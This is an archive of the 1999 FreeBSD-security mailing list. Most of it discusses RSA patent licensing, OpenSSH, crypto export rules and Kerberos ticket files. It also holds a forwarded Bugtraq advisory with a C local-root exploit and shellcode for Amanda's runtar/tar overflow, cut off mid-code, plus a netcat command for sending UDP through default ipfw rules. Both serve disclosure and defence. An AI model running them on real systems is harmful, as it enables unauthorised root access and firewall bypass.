1999-Aug-7) Date: Tue, 2 Nov 1999 12:00:18 -0600 (CST) From: James Wyatt To: Dug Song Cc: Niels Provos , security@FreeBSD.ORG, ports@FreeBSD.ORG, markus@openbsd.org Subject: Re: OpenSSH patches In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 2 Nov 1999, Dug Song wrote: > On Tue, 2 Nov 1999, Niels Provos wrote: > > One of them, already convincing enough by itself, is the free > > commercial use. > > not within the US, though. :-( > > OpenBSD's OpenSSL relies on the system libcrypto, which uses a different > RSA implementation depending on which ssl26 package you've installed. > > for US users, this is RSAREF (RSA's reference implementation), which is > only available for NON-commercial use. in order to use RSAREF (or indeed, > any implementation of RSA) commercially, you must buy an RSA license. > there is no way around this. [ ... ] > all software that uses RSA is subject to this bogosity, including PGP: [ ... ] > http://bs.mit.edu:8001/pgp-form.html > http://www.scramdisk.clara.net/pgpfaq.html#SubRSAREF I was under the impression that the RSA code was best for ApacheSSL support and anything else (like ssh) could use several others (DES, BlowFish, etc...). I can also more easily get an RSA license because I have to cover it for a year or so anyway - until the patent expires. Most businesses are used to paying for the web server certs and licences, but some will balk at something new. "*What* is this for again? I've never heard of it." - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 10:18:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from tinker.com (troll.tinker.com [204.214.7.146]) by hub.freebsd.org (Postfix) with ESMTP id B52C514D4D for ; Tue, 2 Nov 1999 10:17:54 -0800 (PST) (envelope-from kim@tinker.com) Received: by localhost (8.8.5/8.8.5) Received: by mail.tinker.com via smap (V2.0) id xma028034; Tue Nov 2 11:53:35 1999 Received: by localhost (8.8.8/8.8.8) id MAA05904; Tue, 2 Nov 1999 12:17:50 -0600 (CST) Message-ID: <381F2B4D.579629C1@tinker.com> Date: Tue, 02 Nov 1999 12:19:57 -0600 From: Kim Shrier Organization: Shrier and Deihl X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 3.2-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: "Gary D. Kline" Cc: security@freebsd.org Subject: Re: OpenSSH patches References: <199911021749.JAA10864@tao.thought.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Gary D. Kline" wrote: > > Anybody know how much longer the RSA patent > hold? Seems to me it runs out in the next few > years. > > gary > I believe it expires on September 2, 2000. Kim Shrier -- Kim Shrier - principal, Shrier and Deihl - mailto:kim@tinker.com Remote Unix Network Admin, Security, Internet Software Development Tinker Internet Services - Superior FreeBSD-based Web Hosting http://www.tinker.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 10:59:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 33B0D1545A; Tue, 2 Nov 1999 10:59:12 -0800 (PST) (envelope-from jkh@zippy.cdrom.com) Received: from localhost (localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id KAA56030; Tue, 2 Nov 1999 10:58:37 -0800 (PST) (envelope-from jkh@zippy.cdrom.com) To: Robert Watson Cc: "Jordan K. Hubbard" , Poul-Henning Kamp , Kris Kennaway , security@FreeBSD.ORG, ports@FreeBSD.ORG Subject: Re: OpenSSH patches In-reply-to: Your message of "Tue, 02 Nov 1999 13:46:45 EST." Date: Tue, 02 Nov 1999 10:58:37 -0800 Message-ID: <56026.941569117@localhost> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > And if this means OpenSSL bundled also? :-) Bundling apache-modssl would > also be nice, as with K5, krbIV support versions of various packages, etc. Yes, this means OpenSSL also. > BTW, "they" tell me that when the new crypto guidelines are released, the > chances are they will also be friendly to open source. Hopefully "they" > are right. (they being people appropriately placed in the process) I've been told the same thing but am investigating an export license in any case. For a lot of good reasons, this is something we really need, even if we have to take a few chances and/or move a CVS server to Canada. :) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 11: 8:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from funky.monkey.org (funky.monkey.org [63.77.239.12]) by hub.freebsd.org (Postfix) with ESMTP id D7C3115067; Tue, 2 Nov 1999 11:08:18 -0800 (PST) (envelope-from dugsong@monkey.org) Received: by funky.monkey.org (Postfix, from userid 1001) id 093F5151A1; Tue, 2 Nov 1999 14:02:45 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by funky.monkey.org (Postfix) with ESMTP id EC8D414A01; Tue, 2 Nov 1999 14:02:44 -0500 (EST) Date: Tue, 2 Nov 1999 14:02:44 -0500 (EST) From: Dug Song To: "Gary D. Kline" Cc: provos@citi.umich.edu, security@FreeBSD.ORG, ports@FreeBSD.ORG, markus@openbsd.org Subject: Re: OpenSSH patches In-Reply-To: <199911021749.JAA10864@tao.thought.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 2 Nov 1999, Gary D. Kline wrote: > Anybody know how much longer the RSA patent hold? Seems to me it runs > out in the next few years. from OpenBSD's ssl(8): BUGS According to "Applied Cryptography: Schneier" the RSA patent will expire September 20th, 2000. Patents can be renewed. -d. --- http://www.monkey.org/~dugsong/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 11:47:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 7344F14D82; Tue, 2 Nov 1999 11:47:34 -0800 (PST) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id NAA29570; Tue, 2 Nov 1999 13:46:45 -0500 (EST) (envelope-from robert@cyrus.watson.org) Date: Tue, 2 Nov 1999 13:46:45 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: "Jordan K. Hubbard" Cc: Poul-Henning Kamp , Kris Kennaway , security@FreeBSD.ORG, ports@FreeBSD.ORG Subject: Re: OpenSSH patches In-Reply-To: <6891.941523712@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 1 Nov 1999, Jordan K. Hubbard wrote: > > Well, that is really the deciding point I think. So can you get a > > definite answer ? > > Yes, I'll work on this. Having ssh bundled into FreeBSD is pretty > important to me. And if this means OpenSSL bundled also? :-) Bundling apache-modssl would also be nice, as with K5, krbIV support versions of various packages, etc. BTW, "they" tell me that when the new crypto guidelines are released, the chances are they will also be friendly to open source. Hopefully "they" are right. (they being people appropriately placed in the process) I personally prefer the European arrangement where open source crypto is fine, but closed source is subject to limitations :-). I guess we shouldn't get started on the whole crypto export debate, but just to summarize the eventual conclusion: "It sucks". Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 11:48:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 04E06154AA; Tue, 2 Nov 1999 11:47:34 -0800 (PST) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id LAA28422; Tue, 2 Nov 1999 11:18:06 -0500 (EST) (envelope-from robert@cyrus.watson.org) Date: Tue, 2 Nov 1999 11:18:06 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: freebsd-security@FreeBSD.ORG Cc: "Tellier, Brock" , gpalmer@FreeBSD.ORG, cwt@FreeBSD.ORG Subject: Buffer overflow in tar, amanda permissions/symlinks (was: bugtraq: , Amanda multiple vendor local root compromises (fwd)) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In the bugtraq message below, Brock Tellier outlines an attack based on a number security issues in FreeBSD. The first has to do with our packaging of Amanda, which introduces weaker security constraints than the default Amanda installation from the developer. The second has to do with a buffer overflow vulnerability in tar (more serious, I think), and the third is a bug strictly in Amanda (that manifests itself on BSD also). The tar bug concerns me a lot--I'm not sure how well audited the tar code is, but a lot of people expect that they can untar a tar file from an untrusted third party and not give up all their privileges to that party. This bug has to do with the length of the filename--a four hundred letter long filename is sure to arouse some suspicion, if it is handled manually, but this might imply the existence of other buffer overflows in the file, and cause trouble for anyone who accepts tarballs in some automated manner and then untars them automatically. I don't know how the OpenBSD tar and our tar differ, but it might be worthwhile to compare them, as needless to say their code is extremely well audited for buffer-overflow sorts of bugs. The symlink bug is a problem for the Amanda maintainers, and it presumably a question of using mktemp(). I don't have contact information for them, but hopefully they read bugtraq or someone can forward this or the original message to them. Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services ---------- Forwarded message ---------- Date: Sat, 30 Oct 1999 23:14:25 -0700 From: "Tellier, Brock" To: BUGTRAQ@SECURITYFOCUS.COM Subject: Amanda multiple vendor local root compromises Greetings, OVERVIEW: The Amanda backup package has a several vulnerabilities which will allow any user to gain root privs. BACKGROUND: My tests were done ONLY on FreeBSD 3.3-RELEASE, though this is almost certainly not the only vulnerable OS. A search for "amanda-2 and not freebsd" on altavista yields preliminary, unconfirmed data that some of the vulnerable OS's (based on packages that are included on install CD's, anyone can install Amanda to make themselves vulnerable) may be: RedHat ?.?, TurboLinux, PowerTools CD, SuSE 6.2 Confirmation on which OS's/tar's are vulnerable would be useful. DETAILS: Amanda's "runtar" program, suid root by default on FreeBSD 3.3, calls /usr/bin/tar and passes all args given to runtar to this program. Tar is thus run with root permissions and is vulnerable to all of the same attacks on suid programs that it would have if it were suid itself. Vuln #1 - run tar as root Since tar is run with root permissions, you are free to tar up any file you wish, including /etc/master.passwd. You may also untar any file you wish, to any location on the system, including /etc/master.passwd. This does not require any exploit kung-fu and may be done by supplying args to tar/runtar as if you were root. Vuln #1.1 - tar contains a buffer overflow Obtaining root via buffer overflow here is redundant, of course, but it illustrates the point that even if tar's capabilities weren't able to gain root privs, the buffer overflow would still allow you to do so. An overflow exists *IN TAR* which will allow any user to execute commands as root. Note that an overflow in tar isn't an immediate security flaw since it is never suid/sgid, but it goes to show that one should do security audits of all the programs one calls with user input. By passing a long string to runtar in the form "/usr/local/libexec/amanda/runtar cvf $400bytes:bah" we can execute our commands. FreeBSD exploit attached below. Vuln #2 - symlink problem Not quite as serious, but a concern nonetheless. When the amandad daemon is run, a bin-owned file called "amandad.debug" in /tmp. By creating a symlink from /tmp/amandad.debug to any other file, we will force amandad to clobber the contents with that of amandad's debug info. Note that amandad is not suid/sgid, but it is often run with root perms at startup or via scripts. WHO IS VULNERABLE: Anyone running a suid version of runtar should be suspicious. I've not tested any other O.S.'s except FreeBSD 3.3, which includes amanda 2.3.0 and 2.4.1 as "additional packages" on the install CD and tar-1.11.2. EXPLOIT: /* * Amanda runtar exploit yields euid=0(root) * Actually overflows tar 1.11.2 (included in FreeBSD 3.3) * Tested on FreeBSD 3.3, modify shell/addr/dir for Amanda/tar on other * platforms * * Compile gcc -o amandax amandax.c * Run ./amandax * keep buflen around 400, try positive and negative offsets * * Brock Tellier btellier@usa.net */ #include #include char fbsdshell[]= /* mudge@lopht.com */ "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh"; #define LEN 400 #define NOP 0x90 #define ALIGN 3 #define OFFSET 0 #define ADDR 0xbfbfdd90 /* fbsd 3.3 */ int main(int argc, char *argv[]) { long int offset=OFFSET; int i; int buflen = LEN; long int addr = ADDR; char buf[LEN]; if (argc > 1) offset = atoi(argv[1]); if (argc > 2) buflen = atoi(argv[2]); if (argc > 3) { fprintf(stderr, "Usage: %s "); exit(0); } fprintf(stderr, "Amanda runtar exploit for FreeBSD 3.3\n"); fprintf(stderr, "Brock Tellier btellier@usa.net\n"); fprintf(stderr, "Using addr: 0x%x\t buflen: %d\t offset: %d\n", addr+offset, buflen, offset); memset(buf,NOP,buflen); memcpy(buf+100,fbsdshell,strlen(fbsdshell)); for(i= 100 + strlen(fbsdshell)+ALIGN;i Date: Tue, 02 Nov 1999 20:33:49 +0000 From: Adam Laurie Organization: A.L. Group plc X-Mailer: Mozilla 4.07 [en] (Win95; I) MIME-Version: 1.0 To: Brian Fundakowski Feldman Cc: Group Paranoia Subject: Re: hole(s) in default rc.firewall rules References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brian Fundakowski Feldman wrote: > > On Mon, 1 Nov 1999, Adam Laurie wrote: > > > It seems to me that the following rules (and multiple variations) > > provide a Great Big Hole(tm) through ipfw into your UDP services... > > It's pretty simple to use the following. > > > > > # Allow DNS queries out in the world > > $fwcmd add pass udp from any 53 to ${ip} > 53 > > $fwcmd add pass udp from ${ip} to any 53 > > > > # Allow NTP queries out in the world > > $fwcmd add pass udp from any 123 to ${ip} > 123 > > $fwcmd add pass udp from ${ip} to any 123 > > Yes, but this wouldn't allow userland DNS (like nslookup). My final suggestion, taking into account comments so far: # block low port and NFS UDP but allow outgoing and replies for DNS, NTP # (and anything else that needs it). $fwcmd add pass udp from any to ${ip} 53,123 $fwcmd add deny udp from any to ${ip} 0-1023,1110,2049 $fwcmd add pass udp from any to any And for those that don't think this is a serious issue... Get a copy of netcat. Make sure syslogd is running in default mode (i.e. without "-s" option) on the target "firewalled" server. Run the following command on a machine outside the firewall: nc -u -p 53 -n [firewalled-server-ip] 514 and type some text in. Now go and tail /var/log/messages on the target server, and you'll see the text that has just walked through your firewall. I leave it as an exercise for the reader to exploit an NFS mount in a similar fashion... cheers, Adam -- Adam Laurie Tel: +44 (181) 742 0755 A.L. Digital Ltd. Fax: +44 (181) 742 5995 Voysey House Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 12:36:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from alcanet.com.au (border.alcanet.com.au [203.62.196.10]) by hub.freebsd.org (Postfix) with ESMTP id EA9F014F10 for ; Tue, 2 Nov 1999 12:36:20 -0800 (PST) (envelope-from jeremyp@gsmx07.alcatel.com.au) Received: by border.alcanet.com.au id <40337>; Wed, 3 Nov 1999 07:30:50 +1100 Content-return: prohibited Date: Wed, 3 Nov 1999 07:36:12 +1100 From: Peter Jeremy Subject: Re: OpenSSH patches In-reply-to: To: Dug Song Cc: security@FreeBSD.ORG Reply-To: peter.jeremy@alcatel.com.au Message-Id: <99Nov3.073050est.40337@border.alcanet.com.au> MIME-version: 1.0 X-Mailer: Mutt 1.0pre3i Content-type: text/plain; charset=us-ascii References: <199911021749.JAA10864@tao.thought.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 1999-Nov-03 06:02:44 +1100, Dug Song wrote: >from OpenBSD's ssl(8): > >BUGS > According to "Applied Cryptography: Schneier" the RSA patent will > expire September 20th, 2000. > > Patents can be renewed. Unless someone's snuck a radical change to Patent Law through recently, this isn't true. Patents automatically pass into the public domain after 17(?) years. Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 12:36:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id D7C1E1544E; Tue, 2 Nov 1999 12:36:49 -0800 (PST) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (2378 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Tue, 2 Nov 1999 14:35:24 -0600 (CST) (Smail-3.2.0.106 1999-Mar-31 #1 built 1999-Aug-7) Date: Tue, 2 Nov 1999 14:35:20 -0600 (CST) From: James Wyatt To: security@FreeBSD.ORG, ports@FreeBSD.ORG Cc: "Gary D. Kline" , provos@citi.umich.edu, security@FreeBSD.ORG, ports@FreeBSD.ORG, markus@openbsd.org, Dug Song Subject: Re: OpenSSH patches In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 2 Nov 1999, Dug Song wrote: > you can't use ApacheSSL in the US, unless you've paid RSA for a license > for the RSA implementation in SSLeay or OpenSSL. Yes, and I was lead to believe that buying the RadHat server pack (which comes with an RSA license for Apache/SSLeay) would cover a FreeBSD server as long as the CPU count was honored. This makes a license $100-150. Any one else know if this is true or there are other approaches? > > I can also more easily get an RSA license because I have to cover it for a > > year or so anyway - until the patent expires. Most businesses are used to > > paying for the web server certs and licences, but some will balk at > > something new. "*What* is this for again? I've never heard of it." - Jy@ > > paying for certificates is NOT the same as purchasing an RSA license for > the use of RSA in your webserver. if you haven't done so, and are using > the webserver for commercial purposes, you're violating their patent. While I completely understand the differences, it is easier to explain to "accounting types" (sorry...) that this is another small fee to run the ecommerce web servers like the certificate fees. Most have even heard of RedHat nowadays, but none have heard of ssh. 8{) > it sucks, i know. beware. Agreed, but watch for reasonable deals, some exist. It is also important that, for ssh, you are not limited to RSA. For Apache/SSLeay, you're stuck. I rather doubt that the original RSA patents will be extended, as well, but you never know... - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 12:54: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id C34F614CAD; Tue, 2 Nov 1999 12:54:01 -0800 (PST) Received: from localhost (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 94B031CD760; Tue, 2 Nov 1999 12:54:01 -0800 (PST) (envelope-from kris@hub.freebsd.org) Date: Tue, 2 Nov 1999 12:54:01 -0800 (PST) From: Kris Kennaway To: Dug Song Cc: Niels Provos , security@FreeBSD.ORG, markus@openbsd.org Subject: Re: OpenSSH patches In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 2 Nov 1999, Dug Song wrote: > OpenBSD's OpenSSL relies on the system libcrypto, which uses a different > RSA implementation depending on which ssl26 package you've installed. Have you guys given thought to adding a Diffie-Hellman replacement for RSA? What does the SSH RFC say about alternative PK algorithms? Kris ---- Cthulhu for President! For when you're tired of choosing the _lesser_ of two evils.. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 12:54:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from bg.sics.se (bg.sics.se [193.10.66.124]) by hub.freebsd.org (Postfix) with ESMTP id CF56314E03 for ; Tue, 2 Nov 1999 12:54:22 -0800 (PST) (envelope-from bg@bg.sics.se) Received: (from bg@localhost) by bg.sics.se (8.9.3/8.9.3) id VAA25174; Tue, 2 Nov 1999 21:54:52 +0100 (CET) (envelope-from bg) To: Robert Watson Cc: freebsd-security@freebsd.org Subject: Re: Kerberos tickets in /tmp -- or somewhere else? References: From: Bjoern Groenvall Date: 02 Nov 1999 21:54:51 +0100 In-Reply-To: Robert Watson's message of Tue, 19 Oct 1999 09:57:59 -0400 (EDT) Message-ID: Lines: 39 X-Mailer: Red Gnus v0.52/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Robert Watson writes: > Does anyone know if there's a way to make our default-installed K4 move > it's tickets somewhere other than /tmp without rebuilding? /tmp on my > busy machines gets filled with ticket files (sometimes many for a > particular user with different variations on the same name). On CMU's > Andrew workstations, they make use of a /tkt with restrictive access > rights for ticket files, which can be cleaned seperately from /tmp, and > more importantly, in a different namespace. > > It sounds like the kind of thing that's hardcoded (and if I remember from > my last source inspection, it is), but perhaps we could make it something > configurable? I guess there is no tradition of a /etc/kerberosIV/krb.rc > (.conf already taken) with a configuration namespace and names/values > :-). This could also be used to configure other host-based > policy--maximum ticket lifespans that the library should acquire, defaults > for ticket-passing behavior once we get K5, etc. In krb4-current it is now possible to define the default ticket prefix in /etc/krb.extra. If you put the variable declaration krb_default_tkt_root = /tkt/tkt in krb.extra then ticket files will be saved in /tkt. If you would like to have a patch (relative krb4) for this change, just ask, but you are probably not interested in rebuilding anyways. The change will probably be merged into FreeBSD at some later point. Cheers, Björn -- _ _ ,_______________. Bjorn Gronvall (Björn Grönvall) /_______________/| Swedish Institute of Computer Science | || PO Box 1263, S-164 29 Kista, Sweden | Schroedingers || Email: bg@sics.se, Phone +46 -8 633 15 25 | Cat |/ Cellular +46 -70 768 06 35, Fax +46 -8 751 72 30 `---------------' To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 12:57: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 3DEFC1541C; Tue, 2 Nov 1999 12:57:02 -0800 (PST) Received: from localhost (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 2D1F81CD446; Tue, 2 Nov 1999 12:56:57 -0800 (PST) (envelope-from kris@hub.freebsd.org) Date: Tue, 2 Nov 1999 12:56:56 -0800 (PST) From: Kris Kennaway To: James Wyatt Cc: Dug Song , Niels Provos , security@FreeBSD.ORG, markus@openbsd.org Subject: Re: OpenSSH patches In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 2 Nov 1999, James Wyatt wrote: > I was under the impression that the RSA code was best for ApacheSSL > support and anything else (like ssh) could use several others (DES, > BlowFish, etc...). There's a fundamental difference between public-key algorithms like RSA, and symmetric algorithms like DES and Blowfish. RSA is used for key distribution in SSH where you have a private key on your client and the corresponding public key on the server. YOu can't use a symmetric algorithm to do that (altough there are non-restricted Public-key algorithms which could be used to replace RSA). You can still use it in "password" mode, which uses the UNIX account password to generate a key for a symmetric algorithm like Blowfish. Kris ---- Cthulhu for President! For when you're tired of choosing the _lesser_ of two evils.. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 13:13:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns.mt.sri.com (ns.mt.sri.com [206.127.79.91]) by hub.freebsd.org (Postfix) with ESMTP id 0C0DC14C35 for ; Tue, 2 Nov 1999 13:13:44 -0800 (PST) (envelope-from nate@mt.sri.com) Received: from mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by ns.mt.sri.com (8.9.3/8.9.3) with SMTP id OAA02734; Tue, 2 Nov 1999 14:13:43 -0700 (MST) (envelope-from nate@rocky.mt.sri.com) Received: by mt.sri.com (SMI-8.6/SMI-SVR4) id OAA25375; Tue, 2 Nov 1999 14:13:42 -0700 Date: Tue, 2 Nov 1999 14:13:42 -0700 Message-Id: <199911022113.OAA25375@mt.sri.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Adam Laurie Cc: Group Paranoia Subject: Re: hole(s) in default rc.firewall rules In-Reply-To: <381F4AAD.1D8E6001@algroup.co.uk> References: <381F4AAD.1D8E6001@algroup.co.uk> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@mt.sri.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > # block low port and NFS UDP but allow outgoing and replies for DNS, > NTP > # (and anything else that needs it). > $fwcmd add pass udp from any to ${ip} 53,123 > $fwcmd add deny udp from any to ${ip} 0-1023,1110,2049 What's special about 1110 and 2049? Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 13:28: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.com (gw.nectar.com [209.98.143.44]) by hub.freebsd.org (Postfix) with ESMTP id E23111532D for ; Tue, 2 Nov 1999 13:28:02 -0800 (PST) (envelope-from nectar@nectar.com) Received: from bone.nectar.com (bone.nectar.com [10.0.0.105]) by gw.nectar.com (Postfix) with ESMTP id D138DC00A; Tue, 2 Nov 1999 15:26:42 -0600 (CST) Received: from bone.nectar.com (localhost [127.0.0.1]) by bone.nectar.com (Postfix) with ESMTP id C69B51DA4; Tue, 2 Nov 1999 15:27:57 -0600 (CST) X-Mailer: exmh version 2.1.0 09/18/1999 X-PGP-RSAfprint: 00 F9 E6 A2 C5 4D 0A 76 26 8B 8B 57 73 D0 DE EE X-PGP-RSAkey: http://www.nectar.com/nectar-rsa.txt X-PGP-DSSfprint: AB2F 8D71 A4F4 467D 352E 8A41 5D79 22E4 71A2 8C73 X-PGP-DHfprint: 2D50 12E5 AB38 60BA AF4B 0778 7242 4460 1C32 F6B1 X-PGP-DH-DSSkey: http://www.nectar.com/nectar-dh-dss.txt From: Jacques Vidrine To: "Jordan K. Hubbard" Cc: security@FreeBSD.ORG In-reply-to: <56026.941569117@localhost> References: <56026.941569117@localhost> Subject: Re: OpenSSH patches Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 02 Nov 1999 15:27:57 -0600 Message-Id: <19991102212757.C69B51DA4@bone.nectar.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [dropped -ports] On 2 November 1999 at 10:58, "Jordan K. Hubbard" wrote: > For a lot of good reasons, this is something we really > need, even if we have to take a few chances and/or move a CVS server > to Canada. :) Don't we already have a CVS server in South Africa for this kind of thing? -- Jacques Vidrine / n@nectar.com / nectar@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 14:22:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from s01.arpa-canada.net (s01.arpa-canada.net [209.104.122.2]) by hub.freebsd.org (Postfix) with ESMTP id D258414D51 for ; Tue, 2 Nov 1999 14:22:09 -0800 (PST) (envelope-from matt@BabCom.ORG) Received: by s01.arpa-canada.net (Postfix, from userid 1001) id 18E52B889; Tue, 2 Nov 1999 17:22:06 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by s01.arpa-canada.net (Postfix) with ESMTP id 12DD3B; Tue, 2 Nov 1999 17:22:06 -0500 (EST) Date: Tue, 2 Nov 1999 17:22:06 -0500 (EST) From: matt X-Sender: matt@s01.arpa-canada.net To: Nate Williams Cc: Adam Laurie , Group Paranoia Subject: Re: hole(s) in default rc.firewall rules In-Reply-To: <199911022113.OAA25375@mt.sri.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 2 Nov 1999, Nate Williams wrote: [.snip.] : What's special about 1110 and 2049? According to /etc/services: nfsd-keepalive 1110/udp # Client status info nfsd 2049/udp nfs # NFS server daemon [.snip.] Matt -- "If the primates that we came from had known that someday politicians would come out of the...the gene pool, they'd a stayed up in the trees and written evolution off as a bad idea. Hell, I always thought the opposable thumb was overrated." -Sheridan, "A Distant Star" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 2 14:47:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id A8E1B15464 for ; Tue, 2 Nov 1999 14:47:29 -0800 (PST) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id QAA31155; Tue, 2 Nov 1999 16:53:43 -0500 (EST) (envelope-from robert@cyrus.watson.org) Date: 